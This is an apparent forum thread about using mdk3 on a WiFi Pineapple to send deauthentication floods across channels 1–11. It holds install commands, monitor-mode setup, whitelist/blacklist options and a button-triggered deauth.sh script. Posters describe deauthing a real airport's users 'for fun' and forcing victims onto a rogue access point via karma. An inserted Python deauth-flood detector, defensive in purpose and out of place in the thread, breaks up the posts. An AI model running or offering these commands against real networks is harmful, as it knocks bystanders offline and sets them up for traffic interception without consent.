
Deauthing Using Mdk3


OK so I saw Darren asking about mdk3 as an alternative to the aircrack suite to deauth.

The great thing about using mdk3 instead of the jammer module/aircrack suite is I saw a huge drop in CPU/RAM usage :-D

SSH into the pineapple and issue

[CODE]
opkg update
[/CODE]

and to install mdk3 to USB. [note] You must use a powered USB hub in order to use more than one device.

[CODE]
opkg --dest usb install mdk3
ln -s /usb/usr/sbin/mdk3 /usr/sbin/mdk3
[/CODE]

Or install it to internal memory, freeing the one USB port for your wifi card:

[CODE]
opkg install mdk3
[/CODE]

Now you can create a monitor interface:

[CODE]
airmon-ng start wlan1
[/CODE]

and to launch mdk3:

[CODE]
mdk3 mon0 d -c 1,2,3,4,5,6,7,8,9,10,11
[/CODE]

Setting channel hopping from 1 to 11 deauths on all channels :-D, about 3 seconds per channel.

[NOTE] Currently firmware 2.6.0-1 does not show stations that are being deauthed, but it is working.

Full instructions to deauth using mdk3 with an external wifi adapter:

[CODE]
airmon-ng start wlan1

ifconfig wlan0 | awk '/HWaddr/ {print $5}' > whitelist.txt #MAC address of wlan0, pineapple ssid

mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11
[/CODE]

Add any other APs' MAC addresses to whitelist.txt that you do not want deauthed, one MAC per line.

Or use the -b option instead ("-b blacklist.txt"); fill blacklist.txt with the MAC addresses that you only want deauthed.

Now if you want to tie it all to, say, the WM button module, I use this script to deauth for 36 seconds (it takes 34 seconds to loop back to channel 1, plus 2+ seconds just in case); it also sets up the whitelist :-D

deauth.sh

[CODE]
#!/bin/sh

# put the external adapter into monitor mode (creates mon0)
airmon-ng start wlan1

# whitelist the pineapple's own wlan0 MAC so it is not deauthed
ifconfig wlan0 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt

# run in the background, hopping channels 1-11 (about 3 seconds each)
mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 &

# one full pass over the channels is about 34 seconds
sleep 36

killall -9 mdk3

airmon-ng stop mon0
[/CODE]

[note] The /tmp/ directory is RAM memory, erased every boot.

This piece of code is very effective at deauthing, plus I love to trigger it via the button module.

I should also note that I have been having issues with my Alfa NHA and run these commands in the start-up script to fix the issue.

This seems to only be an issue with firmware 2.6.0-1. It sets the physical interface (Alfa NHA, usually phy1) to wlan1.

[CODE]
iw phy1 interface add wlan1 type managed
iwconfig wlan1 power on
[/CODE]

Also I found rebooting can sometimes make the NHA disappear, so I have to unplug both the power to the pineapple and the USB hub to properly reset.

Edited by petertfm
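As an added example (not code from this thread or from mdk3), here is the defender's counterpart to the deauth procedure above: a small Python detector that parses raw 802.11 deauthentication/disassociation frames and flags a burst against one BSSID. The frame bytes, MAC addresses and the 10-frames-in-2-seconds threshold are constructed assumptions; in practice the timestamps and frame bytes would come from a monitor-mode capture after stripping the radiotap header.

```python
import struct
from collections import defaultdict, deque
DEAUTH, DISASSOC = 0xC, 0xA   # 802.11 management subtypes (frame type 0)
BROADCAST = "ff:ff:ff:ff:ff:ff"

def _mac(raw, off):
    return ":".join(f"{b:02x}" for b in raw[off:off + 6])

def parse_mgmt_frame(raw):
    """Return (subtype, addr1, addr2, bssid, reason) for a deauth/disassoc frame, else None.
    Layout: FC(2) Duration(2) Addr1(6) Addr2(6) Addr3/BSSID(6) SeqCtl(2) Reason(2) = 26 bytes."""
    if len(raw) < 26:
        return None
    fc = raw[0]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    return subtype, _mac(raw, 4), _mac(raw, 10), _mac(raw, 16), struct.unpack_from("<H", raw, 24)[0]

class DeauthFloodDetector:
    """Alert once a BSSID sees >= threshold deauth/disassoc frames inside a sliding window."""
    def __init__(self, threshold=10, window=2.0):
        self.threshold, self.window = threshold, window
        self.events = defaultdict(deque)   # bssid -> timestamps of recent frames
    def feed(self, ts, raw):
        parsed = parse_mgmt_frame(raw)
        if parsed is None:
            return None
        _, dst, _, bssid, reason = parsed
        q = self.events[bssid]
        q.append(ts)
        while q and ts - q[0] > self.window:   # expire frames older than the window
            q.popleft()
        if len(q) >= self.threshold:
            return {"bssid": bssid, "count": len(q), "broadcast": dst == BROADCAST, "reason": reason}
        return None

def build_deauth(dst, src, bssid, reason=7):
    """Constructed sample deauth frame for testing (not a real capture); reason code is arbitrary."""
    tomac = lambda s: bytes.fromhex(s.replace(":", ""))
    return bytes([0xC0, 0, 0, 0]) + tomac(dst) + tomac(src) + tomac(bssid) + b"\0\0" + struct.pack("<H", reason)

def demo():
    """One isolated deauth at t=0 (no alert), then a 12-frame burst at t=10 (alerts from the 10th)."""
    det = DeauthFloodDetector(threshold=10, window=2.0)
    ap, sta = "00:11:22:33:44:55", "66:77:88:99:aa:bb"   # constructed addresses
    alerts = [det.feed(0.0, build_deauth(sta, ap, ap, reason=3))]
    alerts += [det.feed(10.0 + i * 0.05, build_deauth(sta, ap, ap)) for i in range(12)]
    return [a for a in alerts if a]
```

Because a single-radio hopper like the one above dwells only briefly on each channel (about 3 seconds per channel according to the post), a sensor listening on one channel sees the flood as short periodic bursts, so the detection window should stay short.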

Ah, didn't know he was looking to use it for the pineapple. I tested it in an airport with mdk3 on BT VM. Worked great :D. Nothing like having fun with an airport that was grounded for a storm earlier and flights were 2 hours delayed :D.

cool

I switched to mdk3 from airdrop-ng on BackTrack because the latest version of airdrop-ng is almost impossible for me to install; I can't figure out all the dependencies.

Edited by petertfm

Would the best use of mdk3 be on a VM using a wifi card to deauth a network, and then get the victims to connect to the Pineapple invisibly?

My question is, what's stopping the victim's PC reconnecting to the original network once mdk3 finishes?

Using a computer to do all the deauthing is a good idea if you need most of the pineapple's CPU for other things.

My experience with deauthing is that the victim, after being deauthed a few times, looks for another network to join.


Ya got me! I've been experimenting with MDK3 as part of a yet-to-be released module. During my research I found that mdk3 could be a decent alternative to aireplay-ng since it has built in white and blacklisting, channel hopping, etc.

The most exciting finding however, was regarding interfaces and karma...

I'm able to do frame injection while channel hopping on mon.wlan0 while running karma on wlan0 -- at the same time. I've tested and clients connected to the internet through the pineapple via karma aren't interrupted by the beacon injection I'm doing....even while it channel hops...and new clients are able to connect as well.

Perhaps this has to do with the way beacon frames work as opposed to deauth frames, but it led me to experiment with the latter.

I'm able to run mdk3 mon.wlan0 d -w whitelist.txt (containing the pineapple's wlan0 mac) and it shows that it's deauthing clients nearby, however in my tests it was unable to successfully deauth the galaxy nexus and nexus 7 devices I had connected to a legit AP nearby.

My hope was that we could have a built in way to do whitelisted/blacklisted deauthing on a single radio -- no need for an AWUS036NHA connected -- but so far that isn't the case.

Are anyone else's findings showing otherwise? mdk3 can do some pretty rad things :)

edit: deauth mode findings: unless you specify -c # mdk3 will channel hop 1-14. In the US you may want to specify -c 1,2,3,4,5,6,7,8,9,10,11


Ok so what I have found is I can't use mon.wlan0, mdk3 just hangs, but I can run "airmon-ng start wlan0" then run "mdk3 mon0 d" and all clients are deauthed on channel 11, so any wifi on channel 11 will be deauthed. Works great... but that's just 1/11.

Using -c 6 does not work even though mdk3 says it is; I have edited /etc/config/wireless to channel 6 and after a reboot "mdk3 mon0 d" deauths me from my home wifi.

So the problem is radio0 seems to be stuck on the channel specified in /etc/config/wireless. How can this be changed so true channel hopping is achievable?


Seems we're having similar experiences. mdk3 reports that it's channel hopping, but in my experience it isn't seeing the devices on other channels. Both Nexus devices aren't getting seen. Wish I had saved my output.

I find it interesting the beacon mode channel hops but deauth won't. The best I can figure is that beacons are sent to broadcast FF:FF:FF:FF:FF:FF with the channel set as a parameter within the packet, and not actually sent on said channel. Wireshark supports this. If that's the case then perhaps channel hopping deauth while running Karma on radio0 isn't possible.


Maybe beacon mode is not channel hopping as well; if a device is listening for SSID beacons it would pick it up because it's doing the hopping and not the pineapple. I guess we would need to run airodump-ng on another computer to test this out. I wonder if DigiNinja would know why it's happening this way, if he programmed karma to function this way ("mon.wlan0")?


I have updated the original post. I have found that mdk3 is much better for deauthing than using the aircrack suite.

Instructions to deauth using mdk3 with an external wifi adapter:

[CODE]
ifconfig wlan1 up
airmon-ng start wlan1

ifconfig wlan0 | awk '/HWaddr/ {print $5}' > whitelist.txt #MAC address of wlan0, pineapple ssid

mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11
[/CODE]

Add any other APs' MAC addresses to whitelist.txt that you do not want deauthed.

Or use the -b option instead ("-b blacklist.txt"); fill blacklist.txt with the MAC addresses that you only want deauthed.

Edited by petertfm

So I created a script to run at startup or using the WPS button; currently I am having problems with the button module not running mdk3???

deauth.sh

[CODE]
#!/bin/sh
# bring the external adapter up and put it into monitor mode (creates mon0)
ifconfig wlan1 up
airmon-ng start wlan1

# whitelist the pineapple's own wlan0 MAC so it is not deauthed
ifconfig wlan0 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt

# run in the background, hopping channels 1-11
mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 &

# one full pass over the channels is about 34 seconds
sleep 36

killall -9 mdk3

# tear mon0 down again and power the adapter off
airmon-ng stop mon0
ifconfig wlan1 down
[/CODE]

make sure you chmod +x deauth.sh

I hope to have it working with the push of the WPS button. Also, I create and destroy the mon0 interface each time; I did this for easier coding but it also saves power :-)


I created a script that can be run from the startup script/button module to deauth for 36 seconds; 36 seconds should do all channels (1 to 11).


Edited by petertfm
Not working here. Up to date firmware and using an Alfa 36NHA.

I bring the interface (Alfa) up on wlan1. This works as the blue light comes on. Run airmon and get mon0 on wlan1. Create the whitelist, which I cat to confirm it shows the MAC address, which it does.

If I run

[CODE]
mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11
[/CODE]

it hangs and nothing happens.

If I run

[CODE]
mdk3 mon0 d
[/CODE]

the Alfa turns itself off and I get

[CODE]
Disconnecting between (MAC) and (MAC)

packets sent: 1 - Speed: 1 packets/secread failed: Network is down

wi_read(): Network is down
[/CODE]


With the newest firmware you have to bring wlan1 down before running the script. Are you using a powered hub?


Tried but still no joy. ifconfig wlan1 up - airmon-ng start wlan1 - ifconfig wlan1 down - same thing.

I'm not using a powered hub. Waiting on the Hak5 cable to arrive, but it's international posting so I have to wait. I'm running on 12V though, so I wouldn't have thought there'd be an issue.


mdk3 seems to work fine on mine, although I haven't looked into the channel hopping issue.

My problem is with practicality. Using mdk3 for deauthing with the pineapple only will work well if tethered to an Android, using a wired connection, or a 3G dongle. Most of my setups involve 2 external adapters on my pineapple. You have the pineapple's wifi radio for LAN, one used in client mode for internet access and a third for deauth attacks. The main problem with using mdk3 is that it can only whitelist/blacklist APs, not stations.

Consider this scenario. There is an AP with multiple clients connected. I come in with my pineapple, use one of the external radios to connect to the AP, then use the other radio to deauth. What do I deauth? If I deauth the AP, then my pineapple will lose internet access. If I don't, they have no reason to break their current association, and will never connect to the pineapple.

That is where airdrop is *supposed* to come in. Airdrop takes live output for the clients that are connected and can handle both AP and client rules together. Therefore you can set up a scenario where no one else can connect to any AP except your pineapple, but your WAN adapter on your pineapple can still connect to some rogue AP. But as petertfm has said before, figuring out the dependencies for airdrop is next to impossible.

Given this scenario, using mdk3 is relatively useless. I don't care about anyone connecting to other access points; I just want everyone but my pineapple to be kicked from the access point, which is not possible without client-based rules.

Am I missing something? How is everyone else using mdk3? Is it useful or just trying to get it working?
